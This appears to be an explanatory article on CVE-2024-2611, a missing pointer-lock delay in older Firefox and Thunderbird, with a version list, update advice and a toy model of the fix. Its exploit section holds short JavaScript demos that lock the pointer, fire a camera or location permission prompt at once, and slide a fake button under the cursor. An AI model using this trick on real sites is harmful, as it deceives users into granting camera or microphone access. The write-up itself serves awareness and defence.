CVE-2024-2611 - Pointer Lock Race — How a Missing Delay Tricked Users in Firefox and Thunderbird

In early 2024, a critical vulnerability was discovered and patched in Firefox (before version 124), Firefox ESR (before 115.9), and Thunderbird (before 115.9). Known as CVE-2024-2611, this bug involved a missing delay in the way browsers handle pointer lock, presenting an opportunity for malicious websites to hijack user actions and trick them into granting dangerous permissions. In this long read, we'll break down how the bug worked, how attackers could exploit it, and what you should do to stay safe.

What is Pointer Lock?

Pointer lock is a feature that lets websites hide the mouse cursor and track mouse movement exactly, commonly used in games and web apps that need immersive mouse controls. Normally, the browser shows a permission prompt asking the user if they're okay with the page getting this much control over their mouse.

The Bug: Missing Delay

Browsers are smart: when a site asks for pointer lock, they delay permission dialogs or block them if suspicious actions are detected. The idea is to stop sites from tricking users with sudden pop-ups. But with CVE-2024-2611, Firefox and Thunderbird were missing a small but critical delay when granting pointer lock permissions.

Without that delay, a malicious page could:

- Take over the cursor
- Immediately show a permission prompt (say, for camera/mic access)

Exploit Scenario: How an Attacker Can Trick You

Let’s see how a web page could exploit CVE-2024-2611 in the wild. Note: The following is a simplified and ethical demonstration, only for educational awareness.

Step 1: Lock the Pointer

The attacker sets up a page that requests pointer lock.

// Step 1: Ask for pointer lock (must run from a user gesture such as a click handler)
document.body.requestPointerLock();

Step 2: Instantly Trigger a Permission Prompt

Right after the pointer is locked, the attacker triggers a camera or location permission prompt.

// Step 2: Trigger a permission prompt
navigator.geolocation.getCurrentPosition(() => {}, () => {}, {timeout: 100});

Normally the browser waits—a necessary delay to keep you safe. In affected Firefox versions, that delay wasn’t there!

Step 3: Create a Convincing Fake UI Overlay

When the real permission prompt appears, your cursor is no longer under your control, and you might click "Allow" thinking you’re doing something else.

Here's a hypothetical snippet that moves a fake button under the cursor (it assumes an element with the id fakeButton):

const fakeButton = document.getElementById('fakeButton');
let x = 0, y = 0; // running position; under pointer lock, movementX/Y are deltas, not absolute coordinates
document.addEventListener('mousemove', function(e) {
  x += e.movementX;
  y += e.movementY;
  fakeButton.style.left = x + 'px';
  fakeButton.style.top  = y + 'px';
});

Here's a simplified exploit demo:

<button id="start">Start Trick</button>
<script>
document.getElementById('start').onclick = function() {
    document.body.requestPointerLock();
    setTimeout(() => {
        // Quickly ask for camera after pointer lock!
        navigator.mediaDevices.getUserMedia({video:true})
            .then(stream => {})
            .catch(e => {});
    }, 10); // No delay, so it's instant!
};
</script>

On vulnerable browsers, if the user clicked “Start Trick,” their cursor would lock; the camera permission dialog would appear almost instantly, with no visual clue that their click might end up in the system permission dialog.

The end result: you grant serious permissions (camera, microphone) without realizing it. This sort of UI misdirection is a classic phishing or "clickjacking" technique, and the missing delay made it much easier to pull off.

Which Versions Are Vulnerable?

According to Mozilla's official advisory (MFSA 2024-13), the affected releases are:

- Firefox before 124
- Firefox ESR before 115.9
- Thunderbird before 115.9

How Was It Fixed?

Mozilla developers added a stricter delay, ensuring system permission dialogs cannot appear instantly after pointer lock is granted. This makes it much harder for attackers to sync fake UI with real permission prompts.
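As an added illustration (not Mozilla's patch), here is a small JavaScript model of the policy described above: a permission prompt requested too soon after pointer lock is granted is held back until the delay window has passed. The 1000 ms value, the PromptGate name and the injected clock are assumptions made so it runs offline.

```javascript
// Added example, not Mozilla's code: a toy model of the mitigation described above.
// A permission prompt requested within PROMPT_DELAY_MS of pointer lock being
// granted is held back until that window has passed. The delay value is assumed.
const PROMPT_DELAY_MS = 1000;

class PromptGate {
  constructor(now) {
    this.now = now;            // injected clock (ms) so the logic runs offline
    this.lockGrantedAt = null; // when pointer lock was granted; null while unlocked
    this.pending = [];         // prompts held back by the delay
    this.shown = [];           // prompts that reached the user, with the time shown
  }
  pointerLockGranted() { this.lockGrantedAt = this.now(); }
  pointerLockExited()  { this.lockGrantedAt = null; }

  // Called when the page asks for a permission (camera, geolocation, ...).
  requestPrompt(kind) {
    const t = this.now();
    if (this.lockGrantedAt !== null && t - this.lockGrantedAt < PROMPT_DELAY_MS) {
      // The vulnerable behaviour showed the prompt right here.
      this.pending.push({ kind, notBefore: this.lockGrantedAt + PROMPT_DELAY_MS });
      return 'deferred';
    }
    this.shown.push({ kind, at: t });
    return 'shown';
  }

  // Releases deferred prompts whose window has expired; the browser would do
  // this from its event loop. Returns how many were shown on this tick.
  tick() {
    const t = this.now();
    const ready = this.pending.filter(p => t >= p.notBefore);
    this.pending = this.pending.filter(p => t < p.notBefore);
    for (const p of ready) this.shown.push({ kind: p.kind, at: t });
    return ready.length;
  }
}

// Replays the timing of the demo above: lock at t=0, permission requested
// requestOffsetMs later. Returns how long after the lock the prompt was shown.
function promptGap(requestOffsetMs) {
  let t = 0;
  const gate = new PromptGate(() => t);
  gate.pointerLockGranted();
  t = requestOffsetMs;
  if (gate.requestPrompt('camera') === 'shown') return t;
  while (gate.shown.length === 0) { t += 10; gate.tick(); }
  return gate.shown[0].at;
}
```

With the gate in place, promptGap(10) reports the prompt appearing a full 1000 ms after the lock instead of 10 ms, which is the window the user gets to notice that the cursor is no longer theirs.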

References

- Mozilla Security Advisory: MFSA 2024-13
- NIST Vulnerability Detail - CVE-2024-2611
- Pointer Lock API - MDN Web Docs

What Should You Do?

- Update Now: If you use Firefox or Thunderbird, upgrade to at least Firefox 124, Firefox ESR 115.9, or Thunderbird 115.9.
- Be Cautious: Always read permission prompts carefully—don’t click “Allow” in a hurry, especially on unfamiliar pages.

Conclusion

CVE-2024-2611 is a classic example of how timing and UI handling bugs can turn a harmless feature into a dangerous exploit. Remember: even small delays matter when it comes to user safety. Make sure your browser is up-to-date so you’re protected from these clever tricks!


Stay safe, and as always, keep your software current.

Timeline

Published on: 03/19/2024 12:15:09 UTC
Last modified on: 10/30/2024 19:35:10 UTC